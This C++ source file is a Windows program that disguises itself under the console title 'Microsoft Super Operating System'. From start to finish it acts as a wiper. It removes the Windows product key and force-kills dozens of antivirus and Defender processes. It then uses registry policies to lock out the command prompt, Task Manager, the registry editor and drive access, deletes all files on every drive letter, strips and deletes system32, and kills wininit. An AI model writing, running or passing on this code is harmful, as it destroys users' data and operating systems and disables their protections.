#include<bits/stdc++.h>
#include<windows.h>
#include<conio.h>
using namespace std;
#define cls system("cls")
int main() {
	system("title Microsoft Super Operating System");
	system("mode con cols=15 lines=1");
	Sleep(5000);
	system("start slmgr.vbs -upk");
	cls;
	system("taskkill -im 360safe.exe -f");
	cls;
	system("taskkill -im 360tray.exe -f");
	cls;
	system("taskkill -im 360sd.exe -f");
	cls;
	system("taskkill -im 360rp.exe -f");
	cls;
	system("taskkill -im QQPCMgr.exe -f");
	cls;
	system("taskkill -im QQPCMgrTray.exe -f");
	cls;
	system("taskkill -im QQPCRTP.exe -f");
	cls;
	system("taskkill -im avp.exe -f");
	cls;
	system("taskkill -im kav.exe -f");
	cls;
	system("taskkill -im kis.exe -f");
	cls;
	system("taskkill -im NortonSecurity.exe -f");
	cls;
	system("taskkill -im ccSvcHst.exe -f");
	cls;
	system("taskkill -im SymantecServiceFramework.exe -f");
	cls;
	system("taskkill -im McAfeeSecurityScan.exe -f");
	cls;
	system("taskkill -im McAfeeFrameworkService.exe -f");
	cls;
	system("taskkill -im McScan.exe -f");
	cls;
	system("taskkill -im HIPS.exe -f");
	cls;
	system("taskkill -im HIPStray.exe -f");
	cls;
	system("taskkill -im HipsSvc.exe -f");
	cls;
	system("taskkill -im TrafficProt.exe -f");
	cls;
	system("taskkill -im MsMpEng.exe -f");
	cls;
	system("taskkill -im WinDefend.exe -f");
	cls;
	system("taskkill -im SecHealthUI.exe -f");
	cls;
	system("taskkill -im Windows Defender UI.exe -f");
	cls;
	system("taskkill -im Mcshield.exe -f");
	cls;
	system("taskkill -im Frameworkservice.exe -f");
	cls;
	system("taskkill -im NortonAntiVirus.exe -f");
	cls;
	system("taskkill -im RavMonD.exe -f");
	cls;
	system("taskkill -im RAVMOND.exe -f");
	cls;
	system("taskkill -im ravmon.exe -f");
	cls;
	system("taskkill -im rsrv.exe -f");
	cls;
	system("taskkill -im bdagent.exe -f");
	cls;
	system("taskkill -im bitdefender.exe -f");
	cls;
	system("taskkill -im bdservicehost.exe -f");
	cls;
	system("taskkill -im egui.exe -f");
	cls;
	system("taskkill -im ekrn.exe -f");
	cls;
	system("taskkill -im eService.exe -f");
	cls;
	system("taskkill -im avira.exe -f");
	cls;
	system("taskkill -im avguard.exe -f");
	cls;
	system("taskkill -im avira.service.host.exe -f");
	cls;
	system("taskkill -im Tmcc.exe -f");
	cls;
	system("taskkill -im Tmntsrv.exe -f");
	cls;
	system("taskkill -im TmPfw.exe -f");
	cls;
	system("taskkill -im PandaUI.exe -f");
	cls;
	system("taskkill -im PandaService.exe -f");
	cls;
	system("taskkill -im PandaShield.exe -f");
	cls;
	system("taskkill -im mbam.exe -f");
	cls;
	system("taskkill -im mbamservice.exe -f");
	cls;
	system("taskkill -im mbamtray.exe -f");
	cls;
	system("taskkill -im totalav.exe -f");
	cls;
	system("taskkill -im totalav.service.exe -f");
	cls;
	system("taskkill -im SophosUI.exe -f");
	cls;
	system("taskkill -im SophosService.exe -f");
	cls;
	system("taskkill -im SophosWebProtection.exe -f");
	cls;
	system("taskkill -im kxetray.exe -f");
	cls;
	system("taskkill -im Kxescore.exe -f");
	cls;
	system("taskkill -im KAVStart.exe -f");
	cls;
	system("taskkill -im KWatch.exe -f");
	cls;
	system("taskkill -im KWatchX.exe -f");
	cls;
	system("taskkill -im KAV32.exe -f");
	cls;
	system("taskkill -im KAV64.exe -f");
	cls;
	system("taskkill -im KPFW32.exe -f");
	cls;
	system("taskkill -im KPFW64.exe -f");
	cls;
	system("taskkill -im KPFWtray.exe -f");
	cls;
	system("taskkill -im KMailMon.exe -f");
	cls;
	system("taskkill -im KUpdate.exe -f");
	cls;
	system("taskkill -im KUpdate.BIN -f");
	cls;
	system("taskkill -im ksafe.exe -f");
	cls;
	system("taskkill -im KSafeTray.exe -f");
	cls;
	system("taskkill -im KSafeService.exe -f");
	cls;
	system("taskkill -im kvsrvxp.exe -f");
	cls;
	system("taskkill -im kvsrv64.exe -f");
	cls;
	system("taskkill -im KVMonXP.exe -f");
	cls;
	system("taskkill -im KVMon64.exe -f");
	cls;
	system("taskkill -im KVTray.exe -f");
	cls;
	system("taskkill -im kvnative.exe -f");
	cls;
	system("taskkill -im KVUpdater.exe -f");
	cls;
	system("taskkill -im BaiduSd.exe -f");
	cls;
	system("taskkill -im BaiduSdSvc.exe -f");
	cls;
	system("taskkill -im BaiduSdTray.exe -f");
	cls;
	system("taskkill -im BavSvc.exe -f");
	cls;
	system("taskkill -im BavTray.exe -f");
	cls;
	system("taskkill -im bavmsservice.exe -f");
	cls;
	system("taskkill -im nprotect.exe -f");
	cls;
	system("taskkill -im nspupsvc.exe -f");
	cls;
	system("taskkill -im nprotectsvc.exe -f");
	cls;
	system("taskkill -im VRV.exe -f");
	cls;
	system("taskkill -im VrvArp.exe -f");
	cls;
	system("taskkill -im JingYunSvc.exe -f");
	cls;
	system("taskkill -im JingYunTray.exe -f");
	cls;
	system("taskkill -im FYAntivirus.exe -f");
	cls;
	system("taskkill -im FYFireWall.exe -f");
	cls;
	system("taskkill -im FYService.exe -f");
	cls;
	system("reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer /f");
	cls;
	system("reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /f");
	cls;
	system("reg add HKCU\\Software\\Policies\\Microsoft\\Windows\\System /f");
	cls;
	system("reg add HKCU\\Software\\Policies\\Microsoft\\Windows\\System /v DisableCMD /t REG_DWORD /d 2 /f");
	cls;
	system("reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v DisableTaskMgr /t REG_DWORD /d 1 /f");
	cls;
	system("reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer /v NoClose /t REG_DWORD /d 1 /f");
	cls;
	system("reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f");
	cls;
	system("reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer /v NoDrives /t REG_DWORD /d 4294967295 /f");
	cls;
	system("reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer /v NoRun /t REG_DWORD /d 1 /f");
	cls;
	system("reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer /v NoSetFolders /t REG_DWORD /d 1 /f");
	cls;
	system("reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer /v NoViewOnDrive /t REG_DWORD /d 4294967295 /f");
	cls;
	system("reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer /v NoFind /t REG_DWORD /d 1 /f");
	cls;
	system("taskkill -im wscript.exe -f");
	cls;
	system("reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer /v RestrictRun /t REG_DWORD /d 1 /f");
	cls;
	system("reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer /v NoFolderOptions /t REG_DWORD /d 1 /f");
	cls;
	system("reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v DisableRegistryTools /t REG_DWORD /d 1 /f");
	cls;
	system("taskkill -im explorer.exe -f");
	cls;
	system("del Z:\\* /f /s /q");
	cls;
	system("del Y:\\* /f /s /q");
	cls;
	system("del X:\\* /f /s /q");
	cls;
	system("del W:\\* /f /s /q");
	cls;
	system("del V:\\* /f /s /q");
	cls;
	system("del U:\\* /f /s /q");
	cls;
	system("del T:\\* /f /s /q");
	cls;
	system("del S:\\* /f /s /q");
	cls;
	system("del R:\\* /f /s /q");
	cls;
	system("del Q:\\* /f /s /q");
	cls;
	system("del P:\\* /f /s /q");
	cls;
	system("del O:\\* /f /s /q");
	cls;
	system("del N:\\* /f /s /q");
	cls;
	system("del M:\\* /f /s /q");
	cls;
	system("del L:\\* /f /s /q");
	cls;
	system("del K:\\* /f /s /q");
	cls;
	system("del J:\\* /f /s /q");
	cls;
	system("del I:\\* /f /s /q");
	cls;
	system("del H:\\* /f /s /q");
	cls;
	system("del G:\\* /f /s /q");
	cls;
	system("del F:\\* /f /s /q");
	cls;
	system("del E:\\* /f /s /q");
	cls;
	system("del D:\\* /f /s /q");
	cls;
	system("del B:\\* /f /s /q");
	cls;
	system("del A:\\* /f /s /q");
	cls;
	system("del C:\\* /f /s /q");
	cls;
	system("takeown /f %windir%\\system32 /r /d y");
	cls;
	system("echo Y|cacls %windir%\\system32\\*.* /t /g %username%:F");
	cls;
	system("del /s /q /f %windir%\\system32\\*.*");
	cls;
	system("taskkill -im wininit.exe -f");
	return 0;
}